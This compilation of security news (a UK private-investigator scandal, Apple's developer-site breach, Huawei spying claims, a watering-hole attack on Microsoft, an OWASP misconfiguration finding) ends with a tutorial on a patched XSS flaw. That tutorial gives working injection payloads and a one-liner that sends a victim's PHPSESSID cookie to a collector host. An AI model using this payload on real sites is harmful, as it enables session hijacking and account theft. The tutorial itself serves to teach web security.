Read more here: http://www.kansascity.com/2013/07/24/4365315/hawaii-cyber-range-launches-anti.html#storylink=cpy

Exclusive: 'Bigger than phone hacking' - Soca sat on blue-chip dirty tricks evidence for years

Angry MPs join calls for secret list of those involved as banks and pharmaceutical firms are linked to rogue private investigators

 

Banks and pharmaceutical companies are on a secret list of blue-chip firms that hired private investigators who break the law, The Independent has learned.

The revelation that firms from two of this country’s biggest industries may have commissioned corrupt PIs – without facing prosecution – will fuel concerns that corporations potentially involved in the unlawful trade in private information have so far escaped proper investigation
This newspaper has previously revealed that law firms, insurance companies and financial services organisations have used PIs for years to obtain a range of private data.
Information on the banks and pharmaceutical companies is contained in an explosive list of corrupt PIs’ clients handed to a parliamentary committee by the Serious Organised Crime Agency (Soca). The list of 101 clients also includes some wealthy individuals.
Following weeks of damaging revelations in The Independent, Soca finally bowed to political pressure earlier this week and privately released to MPs the historical details which its investigators ignored for years.
However, the agency has classified the material as secret to safeguard individuals’ human rights and protect the “financial viability of major organisations by tainting them with public association with criminality”.
The decision comes as the newspaper industry is at the centre of the largest criminal investigation in British history over practices including the hiring of corrupt PIs.
Asked this evening if the classified information contained details of banks and pharmaceutical companies, Keith Vaz, chairman of the Home Affairs Select Committee, said: “This affects all manner of organisations.”
Mark Lewis, the lawyer who represents the Milly Dowler family and a long-time scourge of Fleet Street, said: “Consistency demands that the same rules apply to all, whether you run a newspaper, a pharmaceutical company or a law firm.
“As soon as you depart from the  equal applicability of law to all, then the law really does become an ass.”
Trevor Pearce, the director-general of Soca, decided to classify the details of blue-chip companies, in line with Cabinet Office guidelines about sensitive material.
He demanded the list be “kept in a safe in a locked room, within a secure building and that the document should not be left unattended on a desk at any time”.
However, in what would amount to a remarkable snub, the committee is so angry with Soca that it is considering releasing the information under parliamentary privilege.
Mr Vaz said: “We will come to a view as to whether or not we will publish this list. These events took place up to five years ago. Those companies or individuals who either instructed private investigators to break the law or did nothing to stop them must be held to account.”
It is understood other members of the committee are furious that they are being asked to participate in the cover-up. One source said: “This is bigger than the phone-hacking scandal and the committee does not want to be held accountable when all this comes out in the wash.”
Last month The Independent revealed that Soca compiled a dossier in 2008 that outlined how firms, individuals and organised crime bosses hired criminal PIs.
The investigators broke the law to obtain sensitive information, including mobile phone records, bank statements and details of witnesses under police protection.
Soca was analysing intelligence from mostly Scotland Yard investigations that had also failed to prosecute the offenders for the most serious offences – and completely ignored the blue-chip clients who may have profited from their crimes.
The report – which showed the practices went far wider than the newspaper industry – was dismissed by Lord Justice Leveson, who considered it fell outside the narrow terms of reference for his inquiry into the media.
One of five police investigations reviewed by Soca found private detectives listening in to targets’ phone calls in real time. During another police inquiry, the Soca report said officers found a document entitled “The Blagger’s Manual”, which outlined methods of accessing personal information by calling companies, banks, HM Revenue and Customs, councils, utility providers and the NHS.
Illegal practices identified by Soca investigators went well beyond the relatively simple crime of voicemail hacking and also included police corruption, computer hacking and perverting the course of justice.
Meanwhile, in an extraordinary joint admission on the Soca website, Mr Pearce and Commander Neil Basu of the Metropolitan Police admit the agency sat for years on evidence of criminality, until it was finally forced to act in May 2011 by former British Army intelligence officer Ian Hurst whose computer was allegedly hacked  by corrupt private investigators.
Mr Hurst told The Independent: “For reasons that remain unclear, the Leveson Inquiry did not touch the sides with regard to the police. In the final analysis, law enforcement agencies are going to have to justify why they conspired for years to protect the offenders and their clients, which extend way beyond the media.”
The joint statement also failed to address why Soca has still not passed all its historical evidence to Scotland Yard, which is currently investigating the crimes that the agency ignored.
Tom Watson, the campaigning Labour MP, said: “Why is the Met Police not in possession of all the information it would usually require to investigate criminal wrongdoing? Why did Soca not give all the physical evidence in the form of the original hard drives to the Met?
“The Yard and Soca need to provide an urgent explanation as to why the latter is still sitting on a bank of data that any decent police investigator would require to do a proper job.”
Rob Wilson, a senior Conservative MP, has written to Home Secretary Theresa May calling on her to sack Mr Pearce and Soca chairman Sir Ian Andrews over their refusal to publish the list of blue-chip clients.
A Soca spokesman said: “Trevor Pearce provided the chair of the committee with further confidential information on 22 July 2013. Soca is unable to comment further on that detail. However, as stated in the DG’s covering letter  – which is published on the Soca website –  the information provided does not allege, either expressly or by implication, that the individuals and companies named in it, or any individuals working for those companies, have or even may have committed a criminal offence.”

 

 

Hacking: A growing threat to Indian IT

NEW DELHI: The recent data theft by hackers from two Indian companies processing prepaid cards for several overseas banks, which led to a global fraud of 45 million dollars, has made India's 100 billion dollar IT industry a primary target of spam, phishing and viruses. The security breach has reopened the debate on IT security norms followed by Indian firms and the role played by 'ethical' hackers.

A gang of cyber-criminals operating in 26 countries stole $45 million by hacking their way into a database in the second week of May 2013. Another incident which happened recently is of Rs 2.4 crore heist by cyber criminals who hacked into the Mumbai-based current account of the RPG Group of companies.
There have been many attempts by 'ethical' hackers going rogue, resulting in the breach of cyber security of companies as well as individuals, causing financial loss and damage of reputation. The 45 million dollars heist, the News International phone hacking scandal, Indian hackers' retaliatory attack against Brazilian or Bangladeshi counterparts, etc, leaves the victims defaced and robbed.
Reportedly, a group of anonymous hackers from India hacked and defaced 37 Brazilian websites. The attacks were apparently in retaliation to the April 6 cyberattacks on Indian government websites supposedly by Brazil-based hackers. Although there is a nationalistic tinge to the whole scenario, it could prove disastrous if not monitored and channelised.
Lords of Dharmaraja is also alleged to have hacked and posted a threat by uploading the secret documents, memos, and source code of Symantec's product on Pastebin.
It is indeed tough to define something as diverse as hacking. Is it ethical for any computer expert to infiltrate into another person's websites and e mail accounts? Yes, if it is a trustful 'hacker' who uses his ethics and software expertise to strengthen his employers' security apparatus from the hackers with mal intentions. Also, if done for the cause national security. But, if a computer wizard illegally gains access to someone's computer by pretending to be a bonafide entity for fulfilling a personal agenda, then that is a cause for serious concern.
In India, according to Microsoft, 'ethical' hacking is synonymous with prominent names like Ankit Fadia, Sunny Vaghela, Pranav Mistry, Vivek Ramachandran, Koushik Dutta, Aseem Jakhar ,Arulselvar and a few more.
Ankit Fadia, a world-renowned 'ethical' Indian hacker, described the cyber security threat as a menace. "Identity theft of Indian IT firms is rather common. Hackers have the potential to damage the reputation of a bonafide IT firm by stealing their identity and engaging in unscrupulous activities under the corporate's garb that can have disastrous consequence and tarnish reputation. In fact, such misdemeanors could go unnoticed for years together if not detected and rectified in time," he said.
There are quite a few ethical hacking groups in India, like the Indian Cyber Army aka Indishell, Team NUTS, Team Gray Hat, BriskInfoSec Lords of Dharmaraja and the Indian Cyber Devils, that have reportedly been working to safeguards India's cyber space.
An ethical hacking group, on conditions of anonymity, revealed that even while working on a national cause, they may masquerade as an information security company to register domains or create malware in order to protect themselves and get back at their arch-rivals - Information Security and anti-virus companies.
Imparting ethical hacking training is like treading on dangerous grounds, as it raises questions like are these activities justified? Can there be a guarantee that these groups will refrain from crossing the line of mandate? And, is anyone safe in this scenario?
In India, there are a number of training institutes that empower the youth in latest ethical hacking tools & techniques. Institutes like Techdefence, K-Secure CEH, IntelleSecure Network Solutions, Crezone, BriskInfoSec and Kyrion are few of them. However, the most popular certification is CEH (Certified Ethical Hacker) by an American organisation called EC Council, and training material of almost every institute is shaped around its curriculum.
Ethical hacking ensures that the cyber security infrastructure of a private organization as well as government bodies is robust and secure. Although ethical hackers are fast becoming a tribe in India, it is critical to monitor them along with their training institutes. Trainers need to be conscious of imparting this knowledge while setting up the curriculum. Perhaps, it would be prudent for the government to intervene in designing the curriculum and set a minimum age of 18 to shoulder responsibility of such potent knowledge.

Apple's Developers Website Hacked; Shut Down

Bangalore: Apple developers around the word were aghast since the website- developer.apple.com- shutdown on Thursday last week. At first the users too it has a site crash, but today Apple said that it was because of hacking. It also said that the information about some of its 275,000 registered third-party developers who use it may have been stolen, reports The Guardian.

Apple has sent out emails to developers informing them that its developer website was attacked by an outsider last week, AllThingsD reports. The company has stated in the mail that it was due to an intruder’s intervention that it had to shut its developer’s website. On the safety front, Apple has claimed that since the database and information regarding developer’s sensitive personal details had been saved in an encrypted format, these could not be misused by the intruder. Though, it has also mentioned that the attacker might have been able to access developers name, mailing addresses, and/or email addresses.

Apple’s developer site had been shut since Thursday and it had initially said it was down for maintenance, only now revealing the real cause. According to the note sent to developers, the website will remain shut for security reasons, and will be unavailable until the company hardens the security and provides a better safety system. The note also includes that they are “completely overhauling our developer systems, updating our server software, and rebuilding our entire database.”

Apple has not mentioned any detail on when exactly will it reopen for the developers, and has stated that “we expect to have the developer website up again soon.”

The website is updated now, and is reopened for users.

The Apple developer site can be used by developers to get access to iOS 7, OS X Mavericks and other software development kits. It also guides developers in putting their apps to beta testers, and comes with developer-only forums.

Here is the note sent out to the developers:

Apple Developer Website Update

Last Thursday, an intruder attempted to secure personal information of our registered developers from our developer website. Sensitive personal information was encrypted and cannot be accessed, however, we have not been able to rule out the possibility that some developers’ names, mailing addresses, and/or email addresses may have been accessed. In the spirit of transparency, we want to inform you of the issue. We took the site down immediately on Thursday and have been working around the clock since then.

In order to prevent a security threat like this from happening again, we’re completely overhauling our developer systems, updating our server software, and rebuilding our entire database. We apologize for the significant inconvenience that our downtime has caused you and we expect to have the developer website up again soon.

Best example for OWASP- SECURITY MISCONFIGURATION

Security Misconfiguration is one of the top 10 OWASP risks for web application that may give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise.
Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.
Out of several vulnerability checks mentioned on OWASP Security Misconfiguration page, one of the check is following:
Is your error handling set up to prevent stack traces and other overly informative error messages from leaking?
Recently, while doing doing vulnerability assessment at random for some of the top financial websites, I came across this vulnerability:
At this stage, if a user enters the mobile number, he is proceeded with normal registration page.
However, now change the URL manually, and you get an error stacktrace such as following. Notice the change. I changed from execution=e2s1 to execution=1234.

Above stacktrace reveals so much information about the platform in general. Following are some key details:

1. Application Server is Apache Tomcat 6.0.26
2. Component model is based on spring framework
3. Registration is using Spring Web flow
4. Server side programming is based on Java, most probably.

Above can be used by hackers to know about the system very easily, and explore the security holes in various softwares/technology mentioned above to attack.
Solution:
Application server logging shall be configured to show a generic error page against such stack traces.

Former CIA boss says aware of evidence Huawei spying for China

(Reuters) - The former head of the U.S. Central Intelligence Agency said he is aware of hard evidence that Huawei Technologies Co Ltd has spied for the Chinese government, the Australian Financial Review newspaper reported on Friday.
Michael Hayden, also the former head of the U.S. National Security Agency (NSA), said in an interview with the paper that Huawei had "shared with the Chinese state intimate and extensive knowledge of the foreign telecommunications systems it is involved with".
"I think that goes without saying," he was quoted as saying.
The newspaper reported Hayden said intelligence agencies have hard evidence of spying activity by the world's No. 2 telecoms equipment maker. It did not detail that evidence.
Huawei, founded in 1987 by former People's Liberation Army officer Ren Zhengfei, has repeatedly denied being linked to the Chinese government or military or receiving financial support from either.
Hayden is a director of Motorola Solutions, which provides radios, smart tags, barcode scanners and safety products. Huawei and Motorola Solutions Inc (MSI.N) had previously been engaged in intellectual property disputes for a number of years.
Huawei Global Cyber Security Officer John Suffolk described the comments made by Hayden as "tired, unsubstantiated defamatory remarks" and challenged him and other critics to present any evidence publicly.
"Huawei meets the communication needs of more than a third of the planet and our customers have the right to know what these unsubstantiated concerns are," Suffolk said in a statement emailed to Reuters. "It's time to put up or shut up."
The report came a day after Britain announced it would review security at a cyber centre in southern England run by Huawei to ensure that the British telecommunications network is protected.
In October 2012, the U.S. House of Representatives' Intelligence Committee urged American firms to stop doing business with Huawei and ZTE Corp. (000063.SZ) (0763.HK), warning that China could use equipment made by the companies to spy on certain communications and threaten vital systems through computerised links.
The Australian government has barred Huawei from involvement in the building of its A$37.4 billion National Broadband Network.

Microsoft Hacked: Joins Apple, Facebook, Twitter

                Add Microsoft to the list of leading technology companies that have recently seen their employees' computers get hacked after they visited a third-party website devoted to iOS development.

According to a Friday "Recent Cyberattacks" blog post from Matt Thomlinson, general manager for trustworthy computing security at Microsoft, the company "recently experienced a similar security intrusion" to the attacks that penetrated the networks of Apple and Facebook.






"Consistent with our security response practices, we chose not to make a statement during the initial information gathering process," said Thomlinson. "During our investigation, we found a small number of computers, including some in our Mac business unit, that were infected by malicious software using techniques similar to those documented by other organizations. We have no evidence of customer data being affected and our investigation is ongoing."
[ Worried about the Chinese, Russians, hacktivists or cybercrime gangs infiltrating your network? Don't Blame China For Security Hacks, Blame Yourself. ]
Thomlinson's short statement squares with what's already known about the attacks, based on previously issued public comments from Apple, Facebook and Twitter. Namely, in what's called a watering-hole attack, whoever launched these attacks first compromised the popular iPhoneDevSDK website, without tipping off the website's administrator, and then used the site to launch drive-by attacks against anyone who visited. The attacks, which targeted a zero-day vulnerability in the Java browser plug-in that's since been patched by Oracle, were obviously quite effective, because they affected OS X systems at Apple, Facebook, Microsoft and Twitter.
Microsoft's public statement also suggests that many more than just those four businesses may have been successfully compromised by attackers.
What were attackers seeking? One likely answer is that they were simply trawling for any customer data or proprietary company information that would have resale value on the black market, for example to better customize phishing attacks.
But Sean Sullivan, security advisor at F-Secure Labs, has also warned that the attackers may have had their eye on adding backdoor code -- that executes after a time delay -- into mobile iOS apps under development. "Apple and Google's app stores don't review source code, [they] just run the apps," said Sullivan via email. So, thinking like an attacker: "I would inject code that only enables itself in certain circumstances and at certain times (and build a botnet that way)," he said.
Accordingly, Sullivan recommends that all security managers review their employees' website-visiting logs to see if anyone visited iPhoneDevSDK, as well as review their mobile application code bases to look for unauthorized changes. In addition, any businesses -- and especially smaller organizations -- that thought they weren't a target should put a security plan to place to mitigate future zero-day attacks that target their developers. "They should be more proactive (paranoid) in the first place," Sullivan said. "Small startups probably mix work and play. They shouldn't. Buy your developers an additional laptop for just work."
Building a more robust network vulnerability management program can help you identify security holes before an attacker does, as well as develop more secure systems and applications in the future. In the A Guide To Network Vulnerability Management report, we examine the products and practices that will get you there. (Free registration required.)

Simple Cross Site Scripting (XSS) Example

Introduction

This article will try to demonstrate and explain one of many ways XSS is used. The example is based on a previous vulnerability in the profile edit page at HackThis!! (this vulnerability has since been patched) but it is applicable to a lot of places all around the internet. The article will start off by shortly going through how to find a vulnerability that can be used for XSS, and then showing the steps necessary to exploit the vulnerability. The goal of our exploit will be to gain access to the site as another user by stealing his/her “PHPSESSID” cookie.

Finding a vulnerability

The first step when it comes to finding a vulnerability is to find a field, or a parameter, that is processed by the server and then printed somewhere on the page. A good example could be a search field, since sites usually includes the original search-query somewhere on the result page (no, Google is not vulnerable). However, search fields has the disadvantage of, in most cases, being non-persistent (see http://en.wikipedia.org/wiki/Cross-site_scripting#Types for differences between a persistent and a non-persistent XSS vector). A much better field would be a field that is saved, such as the fields on the profile edit page. In this example I decided to try and use the username field on the edit profile page.

Testing a vulnerability

The next step is to check whether the field is vulnerable or not. Depending on where on the page this field is later printed the process differs a bit. The field i choose, the username field on the profile edit page, had its input printed in the value property of the field field itself (see the image above). The first thing you want to do if your value is printed in a field property is to “break out” from the property assignment. In my case that would be by ending the opening quote.

Code:

Name entered: testing"testing

<label for="name">Real Name:</label><br/>
<input name="name" value="testing"testing" />

As you can see above, the quote entered into the field isn’t filtered and the text following the quote is no longer part of the value property of the username field. That means it’s time to insert some javascript.

Once you have found a field that can be modified to let you insert html into the page it’s time to take advantage of it. Let’s start with something easy, just to make sure it really works.

Code:

Name entered: "/><script>alert('xss');</script>

<label for="name">Real Name:</label><br/>
<input name="name" value=""/><script>alert('xss');</script>" />

If you’ve gotten this far without any filters stopping you, then you’re lucky. The field you have choose is vulnerable, and we can go ahead and start exploiting it.

Getting the cookie

As said earlier, we want to get the PHPSESSID cookie. So how would we do that? Luckily for us there is an easy way to get the current cookie(s) in javascript.

Code:

<script>alert(document.cookie);</script>

The document.cookie string looks something like this (without the line-breaks):

Code:

PHPSESSID=1234567890abcdef1234567890abcdef;
_utma=227779588.370893646.1344613812.1344699114.1344703344.10;
__utmc=227779588;
__utmz=227779588.1344613812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

The string returned, as you can see, contains all the cookies for the current page. We only really care about the PHPSESSID, so let’s filter the cookie string a bit.

Code:

var cookieString = document.cookie;
var sessIDMatch = /PHPSESSID=(\w+)/.exec(cookieString);
var sessID = sessIDMatch[1];

This script is unnecessarily long however. Most fields (especially on a profile edit page) will have some kind of length-limit and you will usually have to optimize your script in order to not break this limit. So let’s shorten it down a bit. Often times this can be done using either Google’s Closure Compiler, http://closure-compiler.appspot.com (use the “simple” setting) or the javascript packer, http://dean.edwards.name/packer/ (shrink variables but don’t base 62 encode). In this case though it was better to do it manually, mostly because we are using regular expressions.

Code:

a=/D=(\w+)/.exec(document.cookie)[1];

Note how we are able to use only the big D from the PHPSESSID in our regular expression, as we know that no other cookie ends with a big D.

Stealing the cookie

Now that have found a way to extract the session cookie, we need some way to steal it. For this step you will need to set up your own saving script on another server that can collect the sent cookie. Depending on how “sneaky” you want to be there are a lot of different ways, the easiest being a straight forward redirect to your page, while a more hidden way would be using ajax to send the data in the background. For this example we will be using a third method, an image.

Code:

a=/D=(\w+)/.exec(document.cookie)[1];$('<img>').attr('src','http://example.com/xss.php?s='+a})

There is nothing fancy going on here, we simply created an <img> tag and set its src attribute to the url of our cookie collector script. We then include the session id in the query string. In this example I’ve used jQuery, as it is available on HackThis!!, but it’s also possible to create the img tag using, for example, the document.createElement approach. The jQuery method is considerably shorter however and, as already mentioned, shorter is in these circumstances often better.

Conclusion

With that our simple XSS attack is actually completed. If we had found a field that would expose our script to other member of the site and not only to ourself (as in my case) now all we would have had to do is sit back and wait for someone to stumble across our malicious page. In my case, though, there are a couple of additional steps required to make the exploit work. But that is for a later time.

Thanks for reading, and feel free to send me a PM or leave a comment if there is anything you are wondering about.